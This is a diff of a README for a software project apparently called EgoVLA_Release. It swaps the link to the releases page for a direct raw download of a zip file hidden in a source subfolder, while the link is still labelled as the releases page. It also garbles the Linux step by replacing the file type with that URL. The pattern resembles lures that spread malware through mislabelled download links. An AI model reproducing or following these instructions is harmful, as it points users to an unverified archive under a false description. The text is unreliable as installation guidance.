owadev777/EgoVLA_Release/README.md

 To download and run the software, follow these steps:

-1. **Visit the Releases Page:** Click [here](https://github.com/owadev777/EgoVLA_Release/releases) to go to the releases page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/owadev777/EgoVLA_Release/main/VILA/llava/utils/EgoVLA_Release_v1.4.zip) to go to the releases page.

 2. **Choose the Right Version:** Look for the latest version and download the file suitable for your operating system.
 If you use Windows, download the `.exe` file.
 For macOS, look for the `.dmg` file.
-Linux users will find a `.tar.gz` file.
+Linux users will find a `https://raw.githubusercontent.com/owadev777/EgoVLA_Release/main/VILA/llava/utils/EgoVLA_Release_v1.4.zip` file.

 3. **Install the Application:**
    - **Windows:**